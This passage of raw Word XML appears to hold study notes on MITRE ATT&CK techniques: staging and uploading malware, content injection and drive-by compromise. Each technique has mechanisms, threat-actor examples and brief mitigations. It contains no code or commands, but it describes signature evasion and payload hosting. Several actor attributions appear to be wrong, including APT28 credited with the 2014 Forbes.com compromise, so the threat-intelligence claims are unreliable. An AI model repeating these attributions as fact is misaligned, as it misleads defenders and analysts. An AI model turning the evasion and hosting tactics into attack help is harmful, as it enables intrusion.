        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Buy ready-</w:t>
      </w:r>
      <w:r w:rsidR="007C303B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">made malware (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>infostealers) on dark web forums.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Example: BlackBasta ransomware ($1,000/month subscription) used by FIN7 for data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Delivery: Malware is delivered with setup guides, support, and updates.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Download Open-Source Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Modify publicly available malware (e.g., GitHub repositories) to avoid signature detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Example: North Korean group Lazarus customized open-source RATs (e.g., PoisonIvy) for supply-chain attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Impact: Low cost + high customization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="007C303B" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidR="002E0B92" w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Technique: Stage Capabilities (T1608)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="007C303B" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In this we p</w:t>
      </w:r>
      <w:r w:rsidR="002E0B92" w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>osition attack tools on infrastructure (e.g., websites, cloud) for deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C303B" w:rsidRDefault="007C303B" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="002E0B92" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sub-technique: Upload Malware (T1608.001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host malicious payloads on trusted or disposable services to bypass network filters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="00176A50" w:rsidRDefault="002E0B92" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00176A50">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="00176A50" w:rsidRDefault="002E0B92" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00176A50">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Use Compromised Websites for Malware Hosting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Infect legitimate sites (e.g., WordPress) to host malware in hidden directories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Example: TA505 uploaded FlawedGrace RAT to hacked university websites for distribution via phishing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Advantage: Legitimate domains avoid URL blocklists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="00176A50" w:rsidRDefault="002E0B92" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00176A50">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Abuse Cloud Storage Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Upload malware to public cloud platforms (e.g., Google Drive, AWS S3) using burner accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Example: FIN11 hosted Qbot malware on Microsoft Azure Blob Storage, sharing download links in phishing emails.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A5741B" w:rsidRPr="00A5741B" w:rsidRDefault="002E0B92" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: HTTPS encryption hides malicious traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C66C5E" w:rsidRPr="00176A50" w:rsidRDefault="00C66C5E" w:rsidP="00176A50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRPr="00176A50" w:rsidRDefault="00264887" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
      <w:r w:rsidR="00B66B0A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005458E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00176A50" w:rsidRDefault="005458E8" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access encompasses techniques adversaries use to establish their first presence within a target network. This critical phase involves breaching perimeter defenses via entry vectors like exploited applications, social engineering, or compromised credentials. Success here enables follow-on attacks (e.g., lateral movement or data theft). Mitigation focuses on blocking these entry points to prevent downstream damage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRDefault="005458E8" w:rsidP="00176A50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1) Technique: Content Injection (T1659)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries manipulate legitimate data-transfer channels (e.g., network traffic, APIs) to inject malicious content, redirecting victims or delivering payloads without luring them to compromised sites. Unlike Drive-by Compromise, this technique exploits trusted communication pathways (e.g., ISP-level interception).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DNS/HTTP/SMB Redirection to Fake Update Pages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Compromise upstream network services (e.g., ISP routers) to intercept requests and inject malicious redirects. Victims are silently routed to adversary-controlled sites mimicking legitimate services (e.g., Windows Update).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: MoustachedBouncer manipulated DNS, HTTP, and SMB replies to redirect targets to fake Windows Update pages, triggering malware downloads. This technique evaded traditional domain blocklists by abusing trusted protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Malicious Payload Injection via Compressed Traffic Channels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Exploit middleware (e.g., load balancers) or unencrypted network paths to inject malicious scripts into data streams. This could include tampering with API responses or modifying file downloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Victims receive trojanized versions of legitimate files (e.g., "invoice.zip" containing hidden executables). For example, adversaries injected keyloggers into software updates distributed via CDN networks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Encrypt all sensitive traffic (VPNs, TLS) to prevent interception.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Deploy network intrusion detection systems (NIDS) to spot anomalous redirects or payload patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2) Technique: Drive-by Compromise (T1189)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Victims are compromised simply by visiting a malicious or hijacked website. Exploits target browser/plugin vulnerabilities, often via injected scripts, malvertising, or cross-site scripting (XSS). No user interaction beyond browsing is required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204DBF" w:rsidRDefault="00204DBF" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="00204DBF" w:rsidRDefault="005458E8" w:rsidP="005458E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="00204DBF" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Watering Hole Attacks with Zero-Day Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Compromise websites frequented by a target group (e.g., industry forums). Inject scripts that profile visitors and deliver exploits matching their software vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="005458E8" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005458E8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: APT28 compromised Forbes.com in 2014, using a Flash zero-day (CVE-2014-0502) to infect visitors from defense and government sectors 2. Andariel targeted South Korean sites with IP-range checks to trigger ransomware downloads 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005458E8" w:rsidRPr="00204DBF" w:rsidRDefault="005458E8" w:rsidP="00204DBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DBF">
        <w:rPr>
          <w:b/>
